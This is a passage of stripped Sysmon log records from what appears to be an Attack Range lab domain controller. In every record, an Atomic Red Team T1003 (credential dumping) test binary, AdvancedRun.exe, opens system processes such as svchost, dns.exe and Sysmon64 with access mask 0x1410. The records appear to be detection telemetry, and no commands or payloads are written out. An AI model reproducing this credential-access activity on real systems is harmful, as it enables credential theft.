n\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980002Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 